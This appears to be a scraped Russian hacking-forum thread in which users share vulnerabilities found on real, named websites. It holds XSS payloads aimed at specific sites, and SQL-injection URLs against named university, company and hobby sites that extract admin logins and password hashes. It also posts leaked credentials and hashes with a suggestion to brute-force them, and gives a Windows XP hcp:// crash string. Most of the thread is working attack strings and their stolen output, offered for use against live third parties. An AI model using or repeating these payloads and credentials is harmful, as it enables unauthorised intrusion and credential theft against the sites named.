Инклюд для начала.
QUOTE
ну вот xss докучи...
в поле Ф.И.О. вписываем
+1
помоему в любое поле вообще... такую же байду:
+1
тоже куда хошь... ниче не фильтруется...
+1
в поиске пишем:
+1
вот тебе и юниаструм банк (^_~)
в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
+1
при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
чтобы посмотреть пример залогиньтесь с
+1
уязвимо поле e-mail. пример использования:
QUOTE
в поле Ф.И.О. вписываем
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
помоему в любое поле вообще... такую же байду:
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
тоже куда хошь... ниче не фильтруется...
CODE
"><script>alert(/xss/)</script>
+1
QUOTE
в поиске пишем:
CODE
"><script>alert(/xss/)</script>
+1
вот тебе и юниаструм банк (^_~)
QUOTE
в поле Фамилия, Имя, Отчество: тот же баг у всех на ">
CODE
"><body onLoad=alert('xss')>
+1
QUOTE
при регистрации поле "ник" не фильтруется, можно написаль там к примеру:
CODE
"><script>alert('xss')</script>
чтобы посмотреть пример залогиньтесь с
e-mail: [email protected]
password: cIRLlQ
password: cIRLlQ
+1
QUOTE
уязвимо поле e-mail. пример использования:
CODE
http://www.klerk.ru/subscribe/register.php?email=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
CODE
http://www.oninit.com/reference/index.php?page=[url]
LZA Terminologijas komisija
Один из местных универов.
user: red1
pass: $1$ugldXdZ6$D06H80Jn5ab5Ok3HymTv8/
Один из местных универов.
CODE
http://termini.lza.lv/article.php?id=-1+union+select+1,2,3,concat_ws(user,0x3a,pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+users/*
user: red1
pass: $1$ugldXdZ6$D06H80Jn5ab5Ok3HymTv8/
Big6: Information Skills for Student Achievement
Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо ...):
Блог (сразу админ):
Все хеши md5.
...):Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_password),2,3,4,5+from+big6_users+limit+1,1/*
Блог (сразу админ):
Code
http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass),2,3,4,5+from+blo_users+limit+0,1/*
Все хеши md5.
Не совсем по теме (тут больше веб-уязвимости), но все же:
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:
происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
PPS Работает не на всех компьютерах.
Переполнение буфера обмена программы helpctr.exe
Уязвимые ОС: Win XP
При вводе в IE строки:
Code
hcp://w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.w.
происходит запуск самой программы helpctr.exe Это происходит из-за возникновения в приложении исключения (которое вызывается удаленно из браузера)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
PPS Работает не на всех компьютерах.
Цитата | Quote(ZaHack @ 21.08.2007 - 20:34)
PS Практического применения эта уязвимость, конечно, не имеет, но наглядно показывает "надежность" продуктов от M$
А почему нет? Переполненяем буфер, передаём управление шелл-коду... Все.
Code
http://www.varmint.org/ishop/index.php?GID=-1+union+select+1,2,version(),4,5,6,7,8,9,1,2/*
Таблицы лень подбирать...
ГОРОДСКОЙ ЭЛЕКТРОТРАНСПОРТ
совмещённый трамвайно-троллейбусный сайт
совмещённый трамвайно-троллейбусный сайт
Code
http://stts.mosfont.ru/articles.php?gid=-1+union+select+1,table_name+from+information_schema.tables+limit+0,1/*
www.crim.ncsu.edu
Center for Robotics and Intelligent Machines
Достаем логин и хеш:
admin:75bb40f591c0db371aba50f65741d73f
Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.php
Статическая инфа:
Версия: 5.0.19-max-log
Пользователь: [email protected]
База: wp_crim
Center for Robotics and Intelligent Machines
Достаем логин и хеш:
Code
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*
admin:75bb40f591c0db371aba50f65741d73f
Можно сбрутить... Логинимся тут:
http://www.crim.ncsu.edu/login.php
Статическая инфа:
Версия: 5.0.19-max-log
Пользователь: [email protected]
База: wp_crim
Для просмотра полной версии этой страницы, пожалуйста, пройдите по ссылке: Уязвимости найденные вами
SoftoRooM © 2004-2024